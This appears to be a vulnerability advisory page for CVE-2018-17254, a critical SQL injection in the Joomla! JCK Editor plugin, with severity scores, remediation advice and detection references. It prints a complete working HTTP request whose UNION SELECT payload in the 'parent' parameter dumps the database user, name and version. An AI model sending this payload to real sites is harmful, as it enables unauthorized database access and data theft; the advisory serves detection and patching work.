🔙 목록으로 돌아가기

CVE-2018-17254: Joomla! JCK Editor SQL Injection

TitleJoomla! JCK Editor SQL Injection
AuthorSuman_Kar
SeverityCritical
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.
RemediationUpdate or remove the affected plugin.
CVSS Score9.8
EPSS Score0.89425
CVE IDCVE-2018-17254
CWE IDCWE-89
Tags cve cve2018 packetstorm edb joomla sqli arkextensions joomla\! vkev vuln

🔍 Vulnerability Description

The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter.

🌐 HTTP Request

GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(8513)),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Connection: close
Referer: http://www.victim.com
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-17254.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-17254.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A